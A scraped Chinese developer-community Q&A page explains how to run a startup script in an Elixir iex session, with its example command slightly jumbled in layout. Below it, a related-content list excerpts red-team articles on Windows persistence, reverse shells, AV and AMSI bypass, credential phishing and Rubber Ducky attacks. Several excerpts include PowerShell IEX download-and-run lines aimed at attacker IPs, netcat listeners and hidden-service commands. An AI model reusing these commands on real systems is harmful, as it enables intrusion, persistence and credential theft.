开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何在启动iex会话时执行一些命令？

在启动iex会话时执行一些命令，可以通过在iex启动命令后面添加-r参数来加载一个脚本文件，该脚本文件中可以包含需要执行的命令。

具体步骤如下：

创建一个脚本文件，例如startup.exs，并在其中编写需要执行的命令。例如，我们可以在脚本文件中添加以下内容：IO.puts "Welcome to iex session!"iex -r startup.exs
打开终端，输入以下命令启动iex会话，并加载脚本文件：
此时，iex会话将启动，并执行脚本文件中的命令。在本例中，会输出"Welcome to iex session!"。

需要注意的是，脚本文件的路径应该是相对于当前终端所在的目录。如果脚本文件不在当前目录下，可以使用绝对路径或者相对路径来指定。

推荐的腾讯云相关产品：腾讯云云服务器（CVM），提供了灵活可扩展的云服务器实例，适用于各种应用场景。产品介绍链接地址：https://cloud.tencent.com/product/cvm

相关搜索:BASH如何在脚本终止时执行命令？ByteBuddy如何在类加载时执行一些代码 linux 启动时执行命令 TMUX:如何在启动shell命令时停止新窗口？在anaconda提示启动时自动执行命令在Pi上启动时在终端中执行命令如何在Hibernate中的每个会话启动时运行固定命令如何在oracle启动时执行查询？如何在Play框架启动时执行操作？如何在rapsbian启动时自动执行命令

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Linux 启动时如何自动执行命令或脚本？

在启动时执行 Linux 脚本有两种传统的方法可以实现在启动时执行命令或脚本：方法 #1 - 使用 cron 任务除了常用格式（分 / 时 / 日 / 月 / 周）外，cron 调度器还支持 @reboot...这个指令后面的参数是脚本（启动时要执行的那个脚本）的绝对路径。...不过，使用这个方法，需要授予/etc/rc.d/rc.local文件执行权限： # chmod +x /etc/rc.d/rc.local 然后在这个文件底部添加脚本。..."Tecmint.com" DIR=/home/gacanepa echo "$SITE rocks... add us to your bookmarks." > $DIR/file2.txt *启动时执行...Linux 脚本 * 记住，一定要提前给两个示例脚本授予执行权限： $ chmod +x /home/gacanepa/script1.sh $ chmod +x /home/gacanepa/script2

3.8K4 0

通过计划任务实现持续性攻击

例如使用下面的命令就可以指定在每次系统登录时，操作系统会自动去下载并执行一个基于PowerShell的Payload。...图*-* 命令提示符中实现的计划任务当系统用户再次登录时，系统将下载执行Payload并建立Meterpreter会话。 ?...图*-* 通过计划任务建立的Meterperter 也可以指定Payload在系统启动期间或系统空闲时执行。...如果用户具有管理员级别的权限，就可以使用以下命令来创建一个新的计划任务，该任务将会在系统登录时执行。...图*-* SharPersist–新计划任务（登录时触发）在下一次登录系统时，将执行payload并打开MeterMeter会话。

1.1K3 0

利用计划任务进行权限维持的几种姿势

命令提示符--持久性计划任务当用户再次使用系统登录时，将执行有效负载，并打开meterpreter会话。 ?...Meterpreter – 持久性计划任务也可以在系统启动期间或用户会话处于非活动状态（空闲模式）时执行。...查询事件ID 可以创建一个计划任务，该任务将在系统上发生关联的事件ID时执行有效负载。...查询计划任务当用户管理员注销时，将创建事件ID，并在下次登录时执行有效负载。 ?...SharPersist –新计划任务登录在系统的下一次重新引导中，有效负载将执行，并且Meterpreter会话将打开。 ?

2.8K2 0

反弹shell | 反弹shell总结

Redis因配置不当可以未授权访问（窃取数据、反弹shell、数据备份操作主从复制、命令执行）。攻击者无需认证访问到内部数据，可导致敏感信息泄露，也可以恶意执行flushall来清空所有数据。...1.3 攻击利用 #### 1.redis基本命令连接redis： redis-cli -h 192.168.63.130 查看redis版本信息、一些具体信息、服务器版本信息等等： 192.168.63.130...shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli...····IEX ((New-Object Net.WebClient).DownloadString(‘http://192.168.1.4:4444/connect’)) 然后复制该命令在被攻击机器上执行即可...Step 3：诱导用户去打开该测试文档，然后就可kali终端中有接收到的测试数据进入反弹回来的会话中，使用interact命令连接主机，intetact DMEYHL1V（会话名字） Shell

3.4K2 1

内网渗透基石篇——权限维持分析

该后门会在计算机处于空闲状态时执行，执行成功后会生成名为Persistence.ps1的脚本 $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask...其基本原理是：将代码存储存储于WMI中，达到要求的“无文件”；当设定的条件被满足时，系统将自动启动PowerShell进程去后门程序，执行后，进程将消失（持续根据后门的运行情况而定时间，一般是几秒）。...其基本原理为：将代码加密存储于WMI中，实现无文件；当设定的条件被满足时，系统将自动启动PowerShell进程去执行后门程序，执行后，进程将会消失，实现无进程。...weevely http://192.168.1.2/test/test.php test 补充：一些常用命令及功能： • audit_phpconf：审计PHP配置文件 • audit_suidsgid...• backdoor_tcp：在TCP端口出生成一个后门 • sql_dump：导出数据表 • sql_console：执行SQL查询命令或者启动控制台 • net_ifconfig：获取目标网络的地址

1.4K2 0

Window下常见的权限维持方式

在获取服务器权限后，通常会用一些后门技术来维持服务器权限，服务器一旦被植入后门，攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析，知己知彼方能杜绝后门。...，执行某个脚本。...)\"" 容易遇到的问题：cmd命令行执行单引号会被替换成双引号，故这里使用三个双引号替代。...使用以下命令可实现： sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object...一般分为客户端和服务端，如：灰鸽子、上兴远控、梦想时代、QuasarRAT等。 ? 0x09 结束语未知攻焉知防，本文分享了几种Window下的自启动权限维持技术。

1.2K2 0

利用计划任务维持系统权限

创建计划任务可以本地或者远程操作，也可以作为远程执行命令的一种方式，老版本的 Windows 系统可以用 at 命令创建，新系统内逐渐替换为 schtask 命令。...当用户登录时，payload 执行后，meterpreter 得到一个会话： ?...当管理员登出系统时，触发任务执行： ?...在目标系统重启之后执行 payload，获得会话： ?...列出登录时执行的所有计划任务，可以用于排查恶意软件添加的计划任务： SharPersist -t schtaskbackdoor -m list -o logon ?

1.1K3 0

红队技巧-持久性技巧

\SafeDogSiteApache\SafeDogSiteApache.exe" //启动正常程序然后快捷方式链接换成这个bat文件的链接，这样将会即执行了反弹shell，又会执行正常程序，能有效降低管理员的怀疑...Powershell配置文件： PowerShell配置文件是一个PowerShell脚本，您可以对其进行自定义，并将其特定于会话的元素添加到您启动的每个PowerShell会话中。...它是一个在PowerShell启动时运行的脚本，你可以使用配置文件作为登录脚本来自定义环境，你可以添加命令，功能，别名，模块等。...Users\hacker\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append 这样当PowerShell在系统上再次启动时...，将执行该文件，并且代理将与命令和控件进行通讯。

1.2K3 0

内网系统凭证钓鱼攻击

当用户在假登录屏幕上输入密码时，他会在 AD 或本地执行验证，从而保证密码是正确的，用户输入时会将结果打印在控制台： ?...web 服务器，该程序会将结果发送至远程服务器，然后远程服务器将收到的结果保存在文本文件中，可以将 Powershell 的命令放在 bat 文件中执行，下载地址: https://github.com...在执行 BAT 文件之前，需要将服务器地址添加到相应的 powershell、php 文件中，执行之后在目标系统上显示的窗口如下： ? 只有当提供的凭据正确时，弹出窗口才会消失。...使用下面的命令将 base64 的 payload 执行： powershell.exe -ep bypass -enc ? Metasploit 获得的结果如下： ?...phish_windows_credentials 这个是 Metasploit 框架中的一个模块，可以指定创建特定进程时弹出输入提示窗口，必须制定当前已经连接的 Meterpreter 会话： use

1.4K3 0

sqlps.exe白名单的利用（过S60！）

Tools\Binn\sqlps.exe C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\sqlps.exe 0x02 MSF监听并执行...使用sqlps.exe执行360.ps1后会结束掉当前这个cmd.exe命令提示符，可能要延迟几秒MSF才接收到会话信息。...'))" 0x03 绕过360防护执行众所周知360和火绒对powershell.exe进程的调用监控的非常严， sqlps.exe也有可能已经被360拦截了，如下图。...net.webclient).downloadstring(''http://192.168.1.120/360.ps1''))"' 0x04 注意事项实战中建议根据目标主机实际环境提取相对应版本的sqlps.exe，如单独提取出来的...sqlps.exe在执行时可能会出现缺少依赖项等问题，常见的有以下两种报错。

9201 0

免杀技巧-执行系统命令方式总结

那么接下来就会介绍一些免杀思路。” 01 背景 Windows系统提供了多个二进制文件，可以使用它们执行任意命令。在这，你是不是想到了什么？...既然可以执行命令，那么它将帮助hacker们逃过检测，尤其是对cmd.exe监视的环境下。当然这需要一些前提条件：未正确配置白名单规则（这里涵盖了文件名和路径），使得一些系统可执行文件能够执行。...命令： forfiles /p c:\windows\system32 /m calc.exe /c C:\tmp\hacker.exe ? Msf开启会话： ?...当然也可以用windows自带的“运行”来执行命令。 Pcalua：进程兼容性助手是Windows实用程序，当它检测到存在兼容性问题的软件时就会运行。...命令： waitfor hacker && PowerShell IEX(new-object net.webclient).downloadstring('http://192.168.73.136:

1.5K4 0

反弹shell的学习总结 - Part 2

Step 3：接着就可以看到反弹过来的shell，输入session -i 1进入第一个会话，输入shell，然后再次输入session -i 2，会看到系统的CMD命令行！！ ? ?...启动Empire ?...进入反弹回来的会话中，使用interact命令连接主机，intetact DMEYHL1V（会话名字） ? Shell whoami //查看当前用户 ?...在目标机上启动一个进程进行DLL注入，可以后续的注入更加隐蔽，使用如下的命令新建一个名为notepad.exe的隐蔽进程： Start-Process c:\windows\system32\notepad.exe...执行run之后，会看到生成的powershell命令，复制出来，在目标机上执行 powershell.exe -nop -w hidden -c $h=new-object net.webclient;

1.9K3 1

针对黑客的Windows文件传输总结

这不会将 EXE 文件下载并执行到内存中。当PowerShell脚本被下载并直接执行到内存中时，它会将脚本加载到当前会话中，以便可以执行脚本函数。但是，由于执行策略，这可能会带来问题。...要从 cmd.exe 提示符执行 PowerShell 命令，请使用“ powershell.exe -c ”启动该命令，后跟要执行的 PowerShell 命令，并用双引号引起来。...；然而，我们希望使用一些轻量级的东西，我们可以在没有开销的情况下启动和拆除。...假设在我们开始进行 nmap 扫描时，我们发现 WinRM 正在端口 5985 上运行。经过一些枚举，我们找到了远程管理用户组中帐户的一组凭据。...现在，我们可以在Invoke-Rubeus函数加载到当前会话中时执行该函数，并使用该脚本，而无需将其下载到受害者上。

5651 1

windows权限维持(二)

Winlogon Helper DLL后门 Winlogon是一个Windows组件，用来处理各种活动，如登录、注销、身份验证期间加载用户配置文件、关闭、锁定屏幕等。...Logon Scripts是优先于很多杀毒软件启动（部分杀毒是优先于他启动）的，所以可以通过这种方式将powershell命令写到bat脚本中，达到免杀隐藏启动的效果。...我们将后门dll将其重命名为oci.dll，并将其放置在%SystemRoot%\system32\中，那么重启时，就会加载我们的dll，然后得到一个session。...即可得到会话。第二种方式就是使用wmi事件。...schtasks.exe /Create /TN update /TR xx(你要执行的命令) /SC ONLOGON /F /RL HIGHEST demo： C:\Users\Administrator

1.6K2 0

四十六.Powershell和PowerSploit脚本攻防万字详解

最大的例外是，如果PowerShell脚本文件刚好位于你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如 ....-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem命令使用...而如果要在PowerShell窗口运行脚本程序，必须要管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本。...//cmd窗口执行以下命令 powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11...NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件 Noexit：执行后不退出Shell，这在使用键盘记录等脚本时非常重要再次强调，PowerShell脚本在默认情况下无法直接执行

5071 0

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

最大的例外是，如果PowerShell脚本文件刚好位于你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如 ....，都采用“动词-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem...而如果要在PowerShell窗口运行脚本程序，必须要管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本。...//cmd窗口执行以下命令 powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11...NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件 Noexit：执行后不退出Shell，这在使用键盘记录等脚本时非常重要再次强调，PowerShell脚本在默认情况下无法直接执行

3K3 0

工具| PowerShell的内网渗透之旅(二)

0x00 过渡之前提到当在执行powershell脚本时，由于默认策略的缘故，是会报错的，因此也出现了几种逃过的情况：本地权限绕过：PowerShell.exe -ExecutionPolicy...下载远程PS1脚本权限绕过执行（在本例PowerSploit框架利用中会使用）：powershell.exe "IEX (New-Object Net.WebClient).DownloadString...5).在powershell中调用invoke-shellcode（可通过help命令来查询具体操作以及例子）。 ?...1).通过IEX下载并调用invoke-portscan。 ? ? ? 注意：这里用的全端口扫描，不建议这么做，耗费时间太长，可以扫描一些常规端口。...1).通过IEX下载并调用Get-Keystrokes。 ? ? b.调用Invoke-NinjaCopy复制一些系统无法复制的文件如sam文件。

1.9K6 0

渗透测试中常用powershell（一）

��Ȩ�� C:\Users\Jumbo\Desktop>whoami whoami desktop-ej8rt6l\jumbo 导出rdp/winscp/putty/FileZilla会话与密码...powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/...raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks" 提权简单介绍：如果可执行程序路径未用引号引起来...，如c:\program data\jumbo.exe，则windows启动该应用时会以空格作为分割运行，如会依次尝试运行c:\program.exe、c:\program data\jumbo.exe...，攻击者可以利用进行提权如果低权限可以更改高权限运行的服务，攻击者可以利用进行提权获取域用户登录过哪些机器 powershell -nop -exec bypass -c "IEX(New-Object

1.9K4 0

利用USB橡皮鸭在目标机器上启动Empire或Meterpreter会话

危险藏匿在一些办公场所故意丢弃一个Ducky，例如接待处，停车场和浴室等这些地方通常成功率都相当高。为了不引起怀疑，我们可以将Ducky的标签更改为一些诱人的内容。...乍一看，我们似乎可以选择直接从“运行”框启动base64编码命令来节约时间，但这是不可能的因为该框不会接受这么多的字符。...启动GParted并切换到USB驱动器（通常是/dev/sdb）卸载驱动器（分区->卸载）右键单击并转到“标签文件系统”，然后选择一个符合驱动器故事的标签点击“应用” 步骤5：进一步的伪装为了避免一些不必要的情况发生...步骤6：使用之前的PASTEBIN方法设置注入 Air Gapped系统和离线笔记本电脑：从存储执行在这个例子中我们将创建一个有效负载，以在遇到那些未连接到互联网的计算机时也能创建一个持久性的会话。...最后，我们检查了从Ducky的内部磁盘执行脚本的PoC，即使计算机未连接到互联网时也能创建一个持久性的会话。以上讨论的所有技术都是无文件式攻击，因此对于绕过AV也有一定的效果。

1.7K7 0

一种 Powershell 的混淆方式绕过 AMSI 检测

在这里，iex 在数据变量中执行代码，将其转换为字符串，而错误则重定向到空值，然后将其存储在 $sendback 变量中。...如果你以前玩过 EDR，那么众所周知，这是 IEX 的全名。默认情况下，调用表达式总是被标记为恶意的，因为它用于执行命令。...我们将做的是，使用这个字符串来制作我们的 IEX 命令。...现在同样，我们等待来自服务器的任何输入，在收到任何输入时，它使用 n-eiorvsxpk5执行命令，即 Invoke-Expression，将其转换为字节并发送回。...原因是当你剥离整个代码并在 PowerShell 中逐一执行它们时，您将意识到 IEX 是由 AMSI 标记的部分，而不是任何其他部分。但请随意混淆有效载荷的其余部分。

4.5K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭